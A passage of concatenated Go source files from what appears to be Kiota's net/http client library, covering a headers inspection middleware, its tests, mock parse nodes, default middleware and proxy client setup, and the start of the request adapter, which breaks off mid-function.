github.com/std-uritemplate/std-uritemplate/go/v2 v2.0.3 h1:7hth9376EoQEd1hH4lAp3vnaLP2UMyxuMMghLKzDHyU= 23 | github.com/std-uritemplate/std-uritemplate/go/v2 v2.0.3/go.mod h1:Z5KcoM0YLC7INlNhEezeIZ0TZNYf7WSNO0Lvah4DSeQ= 24 | github.com/stretchr/testify v1.10.0 h1:Xv5erBjTwe/5IxqUQTdXv5kgmIvbHo3QQyRwhJsOfJA= 25 | github.com/stretchr/testify v1.10.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY= 26 | go.opentelemetry.io/auto/sdk v1.1.0 h1:cH53jehLUN6UFLY71z+NDOiNJqDdPRaXzTel0sJySYA= 27 | go.opentelemetry.io/auto/sdk v1.1.0/go.mod h1:3wSPjt5PWp2RhlCcmmOial7AvC4DQqZb7a7wCow3W8A= 28 | go.opentelemetry.io/otel v1.35.0 h1:xKWKPxrxB6OtMCbmMY021CqC45J+3Onta9MqjhnusiQ= 29 | go.opentelemetry.io/otel v1.35.0/go.mod h1:UEqy8Zp11hpkUrL73gSlELM0DupHoiq72dR+Zqel/+Y= 30 | go.opentelemetry.io/otel/metric v1.35.0 h1:0znxYu2SNyuMSQT4Y9WDWej0VpcsxkuklLa4/siN90M= 31 | go.opentelemetry.io/otel/metric v1.35.0/go.mod h1:nKVFgxBZ2fReX6IlyW28MgZojkoAkJGaE8CpgeAU3oE= 32 | go.opentelemetry.io/otel/trace v1.35.0 h1:dPpEfJu1sDIqruz7BHFG3c7528f6ddfSWfFDVt/xgMs= 33 | go.opentelemetry.io/otel/trace v1.35.0/go.mod h1:WUk7DtFp1Aw2MkvqGdwiXYDZZNvA/1J8o6xRXLrIkyc= 34 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 35 | gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= 36 | gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= 37 | gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= 38 | gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 39 | -------------------------------------------------------------------------------- /headers_inspection_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | 6 | abstractions "github.com/microsoft/kiota-abstractions-go" 7 | "go.opentelemetry.io/otel" 8 | "go.opentelemetry.io/otel/attribute" 9 | "go.opentelemetry.io/otel/trace" 10 | ) 11 | 12 | // HeadersInspectionHandlerOptions is the options to use when inspecting headers 13 | type HeadersInspectionOptions struct { 14 | InspectRequestHeaders bool 15 | InspectResponseHeaders bool 16 | RequestHeaders *abstractions.RequestHeaders 17 | ResponseHeaders *abstractions.ResponseHeaders 18 | } 19 | 20 | // NewHeadersInspectionOptions creates a new HeadersInspectionOptions with default options 21 | func NewHeadersInspectionOptions() *HeadersInspectionOptions { 22 | return &HeadersInspectionOptions{ 23 | RequestHeaders: abstractions.NewRequestHeaders(), 24 | ResponseHeaders: abstractions.NewResponseHeaders(), 25 | } 26 | } 27 | 28 | type headersInspectionOptionsInt interface { 29 | abstractions.RequestOption 30 | GetInspectRequestHeaders() bool 31 | GetInspectResponseHeaders() bool 32 | GetRequestHeaders() *abstractions.RequestHeaders 33 | GetResponseHeaders() *abstractions.ResponseHeaders 34 | } 35 | 36 | var headersInspectionKeyValue = abstractions.RequestOptionKey{ 37 | Key: "nethttplibrary.HeadersInspectionOptions", 38 | } 39 | 40 | // GetInspectRequestHeaders returns true if the request headers should be inspected 41 | func (o *HeadersInspectionOptions) GetInspectRequestHeaders() bool { 42 | return o.InspectRequestHeaders 43 | } 44 | 45 | // GetInspectResponseHeaders returns true if the response headers should be inspected 46 | func (o *HeadersInspectionOptions) GetInspectResponseHeaders() bool { 47 | return o.InspectResponseHeaders 48 | } 49 | 50 | // GetRequestHeaders returns the request headers 51 | func (o *HeadersInspectionOptions) GetRequestHeaders() *abstractions.RequestHeaders { 52 | return o.RequestHeaders 53 | } 54 | 55 | // GetResponseHeaders returns the response headers 56 | func (o *HeadersInspectionOptions) GetResponseHeaders() *abstractions.ResponseHeaders { 57 | return o.ResponseHeaders 58 | } 59 | 60 | // GetKey returns the key for the HeadersInspectionOptions 61 | func (o *HeadersInspectionOptions) GetKey() abstractions.RequestOptionKey { 62 | return headersInspectionKeyValue 63 | } 64 | 65 | // HeadersInspectionHandler allows inspecting of the headers of the request and response via a request option 66 | type HeadersInspectionHandler struct { 67 | options HeadersInspectionOptions 68 | } 69 | 70 | // NewHeadersInspectionHandler creates a new HeadersInspectionHandler with default options 71 | func NewHeadersInspectionHandler() *HeadersInspectionHandler { 72 | return NewHeadersInspectionHandlerWithOptions(*NewHeadersInspectionOptions()) 73 | } 74 | 75 | // NewHeadersInspectionHandlerWithOptions creates a new HeadersInspectionHandler with the given options 76 | func NewHeadersInspectionHandlerWithOptions(options HeadersInspectionOptions) *HeadersInspectionHandler { 77 | return &HeadersInspectionHandler{options: options} 78 | } 79 | 80 | // Intercept implements the interface and evaluates whether to retry a failed request. 81 | func (middleware HeadersInspectionHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *nethttp.Request) (*nethttp.Response, error) { 82 | obsOptions := GetObservabilityOptionsFromRequest(req) 83 | ctx := req.Context() 84 | var span trace.Span 85 | var observabilityName string 86 | if obsOptions != nil { 87 | observabilityName = obsOptions.GetTracerInstrumentationName() 88 | ctx, span = otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "HeadersInspectionHandler_Intercept") 89 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.headersInspection.enable", true)) 90 | defer span.End() 91 | req = req.WithContext(ctx) 92 | } 93 | reqOption, ok := req.Context().Value(headersInspectionKeyValue).(headersInspectionOptionsInt) 94 | if !ok { 95 | reqOption = &middleware.options 96 | } 97 | if reqOption.GetInspectRequestHeaders() { 98 | for k, v := range req.Header { 99 | if len(v) == 1 { 100 | reqOption.GetRequestHeaders().Add(k, v[0]) 101 | } else { 102 | reqOption.GetRequestHeaders().Add(k, v[0], v[1:]...) 103 | } 104 | } 105 | } 106 | response, err := pipeline.Next(req, middlewareIndex) 107 | if err != nil { 108 | return response, err 109 | } 110 | if reqOption.GetInspectResponseHeaders() { 111 | for k, v := range response.Header { 112 | if len(v) == 1 { 113 | reqOption.GetResponseHeaders().Add(k, v[0]) 114 | } else { 115 | reqOption.GetResponseHeaders().Add(k, v[0], v[1:]...) 116 | } 117 | } 118 | } 119 | return response, err 120 | } 121 | -------------------------------------------------------------------------------- /headers_inspection_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | "net/http/httptest" 6 | "testing" 7 | 8 | abs "github.com/microsoft/kiota-abstractions-go" 9 | assert "github.com/stretchr/testify/assert" 10 | ) 11 | 12 | func TestItCreateANewHeadersInspectionHandler(t *testing.T) { 13 | handler := NewHeadersInspectionHandler() 14 | assert.NotNil(t, handler) 15 | _, ok := any(handler).(Middleware) 16 | assert.True(t, ok, "handler does not implement Middleware") 17 | } 18 | func TestHeadersInspectionOptionsImplementTheOptionInterface(t *testing.T) { 19 | options := NewHeadersInspectionOptions() 20 | assert.NotNil(t, options) 21 | _, ok := any(options).(abs.RequestOption) 22 | assert.True(t, ok, "options does not implement optionsType") 23 | } 24 | 25 | func TestItGetsRequestHeaders(t *testing.T) { 26 | options := NewHeadersInspectionOptions() 27 | options.InspectRequestHeaders = true 28 | assert.Empty(t, options.GetRequestHeaders().ListKeys()) 29 | handler := NewHeadersInspectionHandlerWithOptions(*options) 30 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 31 | res.Header().Add("test", "test") 32 | res.WriteHeader(200) 33 | res.Write([]byte("body")) 34 | })) 35 | defer func() { testServer.Close() }() 36 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 37 | req.Header.Add("test", "test") 38 | if err != nil { 39 | t.Error(err) 40 | } 41 | _, err = handler.Intercept(newNoopPipeline(), 0, req) 42 | if err != nil { 43 | t.Error(err) 44 | } 45 | 46 | assert.NotEmpty(t, options.GetRequestHeaders().ListKeys()) 47 | assert.Equal(t, "test", options.GetRequestHeaders().Get("test")[0]) 48 | assert.Empty(t, options.GetResponseHeaders().ListKeys()) 49 | } 50 | 51 | func TestItGetsResponseHeaders(t *testing.T) { 52 | options := NewHeadersInspectionOptions() 53 | options.InspectResponseHeaders = true 54 | assert.Empty(t, options.GetRequestHeaders().ListKeys()) 55 | handler := NewHeadersInspectionHandlerWithOptions(*options) 56 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 57 | res.Header().Add("test", "test") 58 | res.WriteHeader(200) 59 | res.Write([]byte("body")) 60 | })) 61 | defer func() { testServer.Close() }() 62 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 63 | req.Header.Add("test", "test") 64 | if err != nil { 65 | t.Error(err) 66 | } 67 | _, err = handler.Intercept(newNoopPipeline(), 0, req) 68 | if err != nil { 69 | t.Error(err) 70 | } 71 | 72 | assert.NotEmpty(t, options.GetResponseHeaders().ListKeys()) 73 | assert.Equal(t, "test", options.GetResponseHeaders().Get("test")[0]) 74 | assert.Empty(t, options.GetRequestHeaders().ListKeys()) 75 | } 76 | -------------------------------------------------------------------------------- /internal/mock_entity.go: -------------------------------------------------------------------------------- 1 | package internal 2 | 3 | import ( 4 | absser "github.com/microsoft/kiota-abstractions-go/serialization" 5 | ) 6 | 7 | type MockEntity struct { 8 | } 9 | 10 | type MockEntityAble interface { 11 | absser.Parsable 12 | } 13 | 14 | func (e *MockEntity) Serialize(writer absser.SerializationWriter) error { 15 | return nil 16 | } 17 | func (e *MockEntity) GetFieldDeserializers() map[string]func(absser.ParseNode) error { 18 | return make(map[string]func(absser.ParseNode) error) 19 | } 20 | func MockEntityFactory(parseNode absser.ParseNode) (absser.Parsable, error) { 21 | return &MockEntity{}, nil 22 | } 23 | -------------------------------------------------------------------------------- /internal/mock_parse_node_factory.go: -------------------------------------------------------------------------------- 1 | package internal 2 | 3 | import ( 4 | "time" 5 | 6 | "github.com/google/uuid" 7 | absser "github.com/microsoft/kiota-abstractions-go/serialization" 8 | ) 9 | 10 | type MockParseNodeFactory struct { 11 | } 12 | 13 | func (e *MockParseNodeFactory) GetValidContentType() (string, error) { 14 | return "application/json", nil 15 | } 16 | func (e *MockParseNodeFactory) GetRootParseNode(contentType string, content []byte) (absser.ParseNode, error) { 17 | return &MockParseNode{}, nil 18 | } 19 | 20 | type MockParseNode struct { 21 | } 22 | 23 | func (e *MockParseNode) GetOnBeforeAssignFieldValues() absser.ParsableAction { 24 | //TODO implement me 25 | panic("implement me") 26 | } 27 | 28 | func (e *MockParseNode) SetOnBeforeAssignFieldValues(action absser.ParsableAction) error { 29 | //TODO implement me 30 | panic("implement me") 31 | } 32 | 33 | func (e *MockParseNode) GetOnAfterAssignFieldValues() absser.ParsableAction { 34 | //TODO implement me 35 | panic("implement me") 36 | } 37 | 38 | func (e *MockParseNode) SetOnAfterAssignFieldValues(action absser.ParsableAction) error { 39 | //TODO implement me 40 | panic("implement me") 41 | } 42 | 43 | func (*MockParseNode) GetRawValue() (interface{}, error) { 44 | return nil, nil 45 | } 46 | 47 | func (e *MockParseNode) GetChildNode(index string) (absser.ParseNode, error) { 48 | return nil, nil 49 | } 50 | func (e *MockParseNode) GetCollectionOfObjectValues(ctor absser.ParsableFactory) ([]absser.Parsable, error) { 51 | return nil, nil 52 | } 53 | func (e *MockParseNode) GetCollectionOfPrimitiveValues(targetType string) ([]interface{}, error) { 54 | return nil, nil 55 | } 56 | func (e *MockParseNode) GetCollectionOfEnumValues(parser absser.EnumFactory) ([]interface{}, error) { 57 | return nil, nil 58 | } 59 | func (e *MockParseNode) GetObjectValue(ctor absser.ParsableFactory) (absser.Parsable, error) { 60 | if ctor != nil { 61 | _, err := ctor(e) 62 | if err != nil { 63 | return nil, err 64 | } 65 | } 66 | return &MockEntity{}, nil 67 | } 68 | func (e *MockParseNode) GetStringValue() (*string, error) { 69 | return nil, nil 70 | } 71 | func (e *MockParseNode) GetBoolValue() (*bool, error) { 72 | return nil, nil 73 | 74 | } 75 | func (e *MockParseNode) GetInt8Value() (*int8, error) { 76 | return nil, nil 77 | 78 | } 79 | func (e *MockParseNode) GetByteValue() (*byte, error) { 80 | return nil, nil 81 | 82 | } 83 | func (e *MockParseNode) GetFloat32Value() (*float32, error) { 84 | return nil, nil 85 | 86 | } 87 | func (e *MockParseNode) GetFloat64Value() (*float64, error) { 88 | return nil, nil 89 | 90 | } 91 | func (e *MockParseNode) GetInt32Value() (*int32, error) { 92 | return nil, nil 93 | 94 | } 95 | func (e *MockParseNode) GetInt64Value() (*int64, error) { 96 | return nil, nil 97 | 98 | } 99 | func (e *MockParseNode) GetTimeValue() (*time.Time, error) { 100 | return nil, nil 101 | 102 | } 103 | func (e *MockParseNode) GetISODurationValue() (*absser.ISODuration, error) { 104 | return nil, nil 105 | 106 | } 107 | func (e *MockParseNode) GetTimeOnlyValue() (*absser.TimeOnly, error) { 108 | return nil, nil 109 | 110 | } 111 | func (e *MockParseNode) GetDateOnlyValue() (*absser.DateOnly, error) { 112 | return nil, nil 113 | 114 | } 115 | func (e *MockParseNode) GetUUIDValue() (*uuid.UUID, error) { 116 | return nil, nil 117 | 118 | } 119 | func (e *MockParseNode) GetEnumValue(parser absser.EnumFactory) (interface{}, error) { 120 | return nil, nil 121 | 122 | } 123 | func (e *MockParseNode) GetByteArrayValue() ([]byte, error) { 124 | return nil, nil 125 | 126 | } 127 | -------------------------------------------------------------------------------- /kiota_client_factory.go: -------------------------------------------------------------------------------- 1 | // Package nethttplibrary implements the Kiota abstractions with net/http to execute the requests. 2 | // It also provides a middleware infrastructure with some default middleware handlers like the retry handler and the redirect handler. 3 | package nethttplibrary 4 | 5 | import ( 6 | "errors" 7 | abs "github.com/microsoft/kiota-abstractions-go" 8 | nethttp "net/http" 9 | "net/url" 10 | "time" 11 | ) 12 | 13 | // GetClientWithProxySettings creates a new default net/http client with a proxy url and default middleware 14 | // Not providing any middleware would result in having default middleware provided 15 | func GetClientWithProxySettings(proxyUrlStr string, middleware ...Middleware) (*nethttp.Client, error) { 16 | client := getDefaultClientWithoutMiddleware() 17 | 18 | transport, err := getTransportWithProxy(proxyUrlStr, nil, middleware...) 19 | if err != nil { 20 | return nil, err 21 | } 22 | client.Transport = transport 23 | return client, nil 24 | } 25 | 26 | // GetClientWithAuthenticatedProxySettings creates a new default net/http client with a proxy url and default middleware 27 | // Not providing any middleware would result in having default middleware provided 28 | func GetClientWithAuthenticatedProxySettings(proxyUrlStr string, username string, password string, middleware ...Middleware) (*nethttp.Client, error) { 29 | client := getDefaultClientWithoutMiddleware() 30 | 31 | user := url.UserPassword(username, password) 32 | transport, err := getTransportWithProxy(proxyUrlStr, user, middleware...) 33 | if err != nil { 34 | return nil, err 35 | } 36 | client.Transport = transport 37 | return client, nil 38 | } 39 | 40 | func getTransportWithProxy(proxyUrlStr string, user *url.Userinfo, middlewares ...Middleware) (nethttp.RoundTripper, error) { 41 | proxyURL, err := url.Parse(proxyUrlStr) 42 | if err != nil { 43 | return nil, err 44 | } 45 | 46 | if user != nil { 47 | proxyURL.User = user 48 | } 49 | 50 | transport := &nethttp.Transport{ 51 | Proxy: nethttp.ProxyURL(proxyURL), 52 | } 53 | 54 | if len(middlewares) == 0 { 55 | middlewares = GetDefaultMiddlewares() 56 | } 57 | 58 | return NewCustomTransportWithParentTransport(transport, middlewares...), nil 59 | } 60 | 61 | // GetDefaultClient creates a new default net/http client with the options configured for the Kiota request adapter 62 | func GetDefaultClient(middleware ...Middleware) *nethttp.Client { 63 | client := getDefaultClientWithoutMiddleware() 64 | client.Transport = NewCustomTransport(middleware...) 65 | return client 66 | } 67 | 68 | // used for internal unit testing 69 | func getDefaultClientWithoutMiddleware() *nethttp.Client { 70 | // the default client doesn't come with any other settings than making a new one does, and using the default client impacts behavior for non-kiota requests 71 | return &nethttp.Client{ 72 | CheckRedirect: func(req *nethttp.Request, via []*nethttp.Request) error { 73 | return nethttp.ErrUseLastResponse 74 | }, 75 | Timeout: time.Second * 100, 76 | } 77 | } 78 | 79 | // GetDefaultMiddlewares creates a new default set of middlewares for the Kiota request adapter 80 | func GetDefaultMiddlewares() []Middleware { 81 | return getDefaultMiddleWare(make(map[abs.RequestOptionKey]Middleware)) 82 | } 83 | 84 | // GetDefaultMiddlewaresWithOptions creates a new default set of middlewares for the Kiota request adapter with options 85 | func GetDefaultMiddlewaresWithOptions(requestOptions ...abs.RequestOption) ([]Middleware, error) { 86 | if len(requestOptions) == 0 { 87 | return GetDefaultMiddlewares(), nil 88 | } 89 | 90 | // map of middleware options 91 | middlewareMap := make(map[abs.RequestOptionKey]Middleware) 92 | 93 | for _, element := range requestOptions { 94 | switch v := element.(type) { 95 | case *RetryHandlerOptions: 96 | middlewareMap[retryKeyValue] = NewRetryHandlerWithOptions(*v) 97 | case *RedirectHandlerOptions: 98 | middlewareMap[redirectKeyValue] = NewRedirectHandlerWithOptions(*v) 99 | case *CompressionOptions: 100 | middlewareMap[compressKey] = NewCompressionHandlerWithOptions(*v) 101 | case CompressionOptions: 102 | println("deprecation notice: function GetDefaultMiddlewaresWithOptions expects a pointer to CompressionOptions. Use the NewCompressionOptionsReference convenience function.") 103 | middlewareMap[compressKey] = NewCompressionHandlerWithOptions(v) 104 | case *ParametersNameDecodingOptions: 105 | middlewareMap[parametersNameDecodingKeyValue] = NewParametersNameDecodingHandlerWithOptions(*v) 106 | case *UserAgentHandlerOptions: 107 | middlewareMap[userAgentKeyValue] = NewUserAgentHandlerWithOptions(v) 108 | case *HeadersInspectionOptions: 109 | middlewareMap[headersInspectionKeyValue] = NewHeadersInspectionHandlerWithOptions(*v) 110 | default: 111 | // none of the above types 112 | return nil, errors.New("unsupported option type") 113 | } 114 | } 115 | 116 | middleware := getDefaultMiddleWare(middlewareMap) 117 | return middleware, nil 118 | } 119 | 120 | // getDefaultMiddleWare creates a new default set of middlewares for the Kiota request adapter 121 | func getDefaultMiddleWare(middlewareMap map[abs.RequestOptionKey]Middleware) []Middleware { 122 | middlewareSource := map[abs.RequestOptionKey]func() Middleware{ 123 | retryKeyValue: func() Middleware { 124 | return NewRetryHandler() 125 | }, 126 | redirectKeyValue: func() Middleware { 127 | return NewRedirectHandler() 128 | }, 129 | compressKey: func() Middleware { 130 | return NewCompressionHandler() 131 | }, 132 | parametersNameDecodingKeyValue: func() Middleware { 133 | return NewParametersNameDecodingHandler() 134 | }, 135 | userAgentKeyValue: func() Middleware { 136 | return NewUserAgentHandler() 137 | }, 138 | headersInspectionKeyValue: func() Middleware { 139 | return NewHeadersInspectionHandler() 140 | }, 141 | } 142 | 143 | // loop over middlewareSource and add any middleware that wasn't provided in the requestOptions 144 | for key, value := range middlewareSource { 145 | if _, ok := middlewareMap[key]; !ok { 146 | middlewareMap[key] = value() 147 | } 148 | } 149 | 150 | var middleware []Middleware 151 | for _, value := range middlewareMap { 152 | middleware = append(middleware, value) 153 | } 154 | 155 | return middleware 156 | } 157 | -------------------------------------------------------------------------------- /kiota_client_factory_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | abstractions "github.com/microsoft/kiota-abstractions-go" 5 | "github.com/stretchr/testify/assert" 6 | nethttp "net/http" 7 | "testing" 8 | "time" 9 | ) 10 | 11 | func TestGetDefaultMiddleWareWithMultipleOptions(t *testing.T) { 12 | retryOptions := RetryHandlerOptions{ 13 | ShouldRetry: func(delay time.Duration, executionCount int, request *nethttp.Request, response *nethttp.Response) bool { 14 | return false 15 | }, 16 | } 17 | redirectHandlerOptions := RedirectHandlerOptions{ 18 | MaxRedirects: defaultMaxRedirects, 19 | ShouldRedirect: func(req *nethttp.Request, res *nethttp.Response) bool { 20 | return true 21 | }, 22 | } 23 | compressionOptions := NewCompressionOptionsReference(false) 24 | parametersNameDecodingOptions := ParametersNameDecodingOptions{ 25 | Enable: true, 26 | ParametersToDecode: []byte{'-', '.', '~', '$'}, 27 | } 28 | userAgentHandlerOptions := UserAgentHandlerOptions{ 29 | Enabled: true, 30 | ProductName: "kiota-go", 31 | ProductVersion: "1.1.0", 32 | } 33 | headersInspectionOptions := HeadersInspectionOptions{ 34 | RequestHeaders: abstractions.NewRequestHeaders(), 35 | ResponseHeaders: abstractions.NewResponseHeaders(), 36 | } 37 | options, err := GetDefaultMiddlewaresWithOptions(&retryOptions, 38 | &redirectHandlerOptions, 39 | compressionOptions, 40 | ¶metersNameDecodingOptions, 41 | &userAgentHandlerOptions, 42 | &headersInspectionOptions, 43 | ) 44 | if err != nil { 45 | t.Errorf(err.Error()) 46 | } 47 | if len(options) != 6 { 48 | t.Errorf("expected 6 middleware, got %v", len(options)) 49 | } 50 | 51 | for _, element := range options { 52 | switch v := element.(type) { 53 | case *CompressionHandler: 54 | assert.Equal(t, v.options.ShouldCompress(), compressionOptions.ShouldCompress()) 55 | } 56 | } 57 | } 58 | 59 | func TestGetDefaultMiddleWareWithInvalidOption(t *testing.T) { 60 | chaosOptions := ChaosHandlerOptions{ 61 | ChaosPercentage: 101, 62 | ChaosStrategy: Random, 63 | } 64 | _, err := GetDefaultMiddlewaresWithOptions(&chaosOptions) 65 | 66 | assert.Equal(t, err.Error(), "unsupported option type") 67 | } 68 | 69 | func TestGetDefaultMiddleWareWithOptions(t *testing.T) { 70 | compression := NewCompressionOptionsReference(false) 71 | options, err := GetDefaultMiddlewaresWithOptions(compression) 72 | verifyMiddlewareWithDisabledCompression(t, options, err) 73 | } 74 | 75 | func TestGetDefaultMiddleWareWithOptionsDeprecated(t *testing.T) { 76 | compression := NewCompressionOptions(false) 77 | options, err := GetDefaultMiddlewaresWithOptions(compression) 78 | verifyMiddlewareWithDisabledCompression(t, options, err) 79 | } 80 | 81 | func verifyMiddlewareWithDisabledCompression(t *testing.T, options []Middleware, err error) { 82 | if err != nil { 83 | t.Errorf(err.Error()) 84 | } 85 | if len(options) != 6 { 86 | t.Errorf("expected 6 middleware, got %v", len(options)) 87 | } 88 | for _, element := range options { 89 | switch v := element.(type) { 90 | case *CompressionHandler: 91 | assert.Equal(t, v.options.ShouldCompress(), false) 92 | } 93 | } 94 | } 95 | 96 | func TestGetDefaultMiddlewares(t *testing.T) { 97 | options := GetDefaultMiddlewares() 98 | if len(options) != 6 { 99 | t.Errorf("expected 6 middleware, got %v", len(options)) 100 | } 101 | 102 | for _, element := range options { 103 | switch v := element.(type) { 104 | case *CompressionHandler: 105 | assert.True(t, v.options.ShouldCompress()) 106 | } 107 | } 108 | } 109 | -------------------------------------------------------------------------------- /middleware.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import nethttp "net/http" 4 | 5 | // Middleware interface for cross cutting concerns with HTTP requests and responses. 6 | type Middleware interface { 7 | // Intercept intercepts the request and returns the response. The implementer MUST call pipeline.Next() 8 | Intercept(Pipeline, int, *nethttp.Request) (*nethttp.Response, error) 9 | } 10 | -------------------------------------------------------------------------------- /nethttp_request_adapter.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "bytes" 5 | "context" 6 | "errors" 7 | "io" 8 | nethttp "net/http" 9 | "reflect" 10 | "regexp" 11 | "strconv" 12 | "strings" 13 | 14 | abs "github.com/microsoft/kiota-abstractions-go" 15 | absauth "github.com/microsoft/kiota-abstractions-go/authentication" 16 | absser "github.com/microsoft/kiota-abstractions-go/serialization" 17 | "github.com/microsoft/kiota-abstractions-go/store" 18 | "go.opentelemetry.io/otel" 19 | "go.opentelemetry.io/otel/attribute" 20 | "go.opentelemetry.io/otel/codes" 21 | "go.opentelemetry.io/otel/trace" 22 | ) 23 | 24 | // nopCloser is an alternate io.nopCloser implementation which 25 | // provides io.ReadSeekCloser instead of io.ReadCloser as we need 26 | // Seek for retries 27 | type nopCloser struct { 28 | io.ReadSeeker 29 | } 30 | 31 | func NopCloser(r io.ReadSeeker) io.ReadSeekCloser { 32 | return nopCloser{r} 33 | } 34 | 35 | func (nopCloser) Close() error { return nil } 36 | 37 | // NetHttpRequestAdapter implements the RequestAdapter interface using net/http 38 | type NetHttpRequestAdapter struct { 39 | // serializationWriterFactory is the factory used to create serialization writers 40 | serializationWriterFactory absser.SerializationWriterFactory 41 | // parseNodeFactory is the factory used to create parse nodes 42 | parseNodeFactory absser.ParseNodeFactory 43 | // httpClient is the client used to send requests 44 | httpClient *nethttp.Client 45 | // authenticationProvider is the provider used to authenticate requests 46 | authenticationProvider absauth.AuthenticationProvider 47 | // The base url for every request. 48 | baseUrl string 49 | // The observation options for the request adapter. 50 | observabilityOptions ObservabilityOptions 51 | } 52 | 53 | // NewNetHttpRequestAdapter creates a new NetHttpRequestAdapter with the given parameters 54 | func NewNetHttpRequestAdapter(authenticationProvider absauth.AuthenticationProvider) (*NetHttpRequestAdapter, error) { 55 | return NewNetHttpRequestAdapterWithParseNodeFactory(authenticationProvider, nil) 56 | } 57 | 58 | // NewNetHttpRequestAdapterWithParseNodeFactory creates a new NetHttpRequestAdapter with the given parameters 59 | func NewNetHttpRequestAdapterWithParseNodeFactory(authenticationProvider absauth.AuthenticationProvider, parseNodeFactory absser.ParseNodeFactory) (*NetHttpRequestAdapter, error) { 60 | return NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactory(authenticationProvider, parseNodeFactory, nil) 61 | } 62 | 63 | // NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactory creates a new NetHttpRequestAdapter with the given parameters 64 | func NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactory(authenticationProvider absauth.AuthenticationProvider, parseNodeFactory absser.ParseNodeFactory, serializationWriterFactory absser.SerializationWriterFactory) (*NetHttpRequestAdapter, error) { 65 | return NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactoryAndHttpClient(authenticationProvider, parseNodeFactory, serializationWriterFactory, nil) 66 | } 67 | 68 | // NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactoryAndHttpClient creates a new NetHttpRequestAdapter with the given parameters 69 | func NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactoryAndHttpClient(authenticationProvider absauth.AuthenticationProvider, parseNodeFactory absser.ParseNodeFactory, serializationWriterFactory absser.SerializationWriterFactory, httpClient *nethttp.Client) (*NetHttpRequestAdapter, error) { 70 | return NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactoryAndHttpClientAndObservabilityOptions(authenticationProvider, parseNodeFactory, serializationWriterFactory, httpClient, ObservabilityOptions{}) 71 | } 72 | 73 | // NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactoryAndHttpClientAndObservabilityOptions creates a new NetHttpRequestAdapter with the given parameters 74 | func NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactoryAndHttpClientAndObservabilityOptions(authenticationProvider absauth.AuthenticationProvider, parseNodeFactory absser.ParseNodeFactory, serializationWriterFactory absser.SerializationWriterFactory, httpClient *nethttp.Client, observabilityOptions ObservabilityOptions) (*NetHttpRequestAdapter, error) { 75 | if authenticationProvider == nil { 76 | return nil, errors.New("authenticationProvider cannot be nil") 77 | } 78 | result := &NetHttpRequestAdapter{ 79 | serializationWriterFactory: serializationWriterFactory, 80 | parseNodeFactory: parseNodeFactory, 81 | httpClient: httpClient, 82 | authenticationProvider: authenticationProvider, 83 | baseUrl: "", 84 | observabilityOptions: observabilityOptions, 85 | } 86 | if result.httpClient == nil { 87 | defaultClient := GetDefaultClient() 88 | result.httpClient = defaultClient 89 | } 90 | if result.serializationWriterFactory == nil { 91 | result.serializationWriterFactory = absser.DefaultSerializationWriterFactoryInstance 92 | } 93 | if result.parseNodeFactory == nil { 94 | result.parseNodeFactory = absser.DefaultParseNodeFactoryInstance 95 | } 96 | return result, nil 97 | } 98 | 99 | // GetSerializationWriterFactory returns the serialization writer factory currently in use for the request adapter service. 100 | func (a *NetHttpRequestAdapter) GetSerializationWriterFactory() absser.SerializationWriterFactory { 101 | return a.serializationWriterFactory 102 | } 103 | 104 | // EnableBackingStore enables the backing store proxies for the SerializationWriters and ParseNodes in use. 105 | func (a *NetHttpRequestAdapter) EnableBackingStore(factory store.BackingStoreFactory) { 106 | a.parseNodeFactory = abs.EnableBackingStoreForParseNodeFactory(a.parseNodeFactory) 107 | a.serializationWriterFactory = abs.EnableBackingStoreForSerializationWriterFactory(a.serializationWriterFactory) 108 | if factory != nil { 109 | store.BackingStoreFactoryInstance = factory 110 | } 111 | } 112 | 113 | // SetBaseUrl sets the base url for every request. 114 | func (a *NetHttpRequestAdapter) SetBaseUrl(baseUrl string) { 115 | a.baseUrl = baseUrl 116 | } 117 | 118 | // GetBaseUrl gets the base url for every request. 119 | func (a *NetHttpRequestAdapter) GetBaseUrl() string { 120 | return a.baseUrl 121 | } 122 | 123 | func (a *NetHttpRequestAdapter) getHttpResponseMessage(ctx context.Context, requestInfo *abs.RequestInformation, claims string, spanForAttributes trace.Span) (*nethttp.Response, error) { 124 | ctx, span := 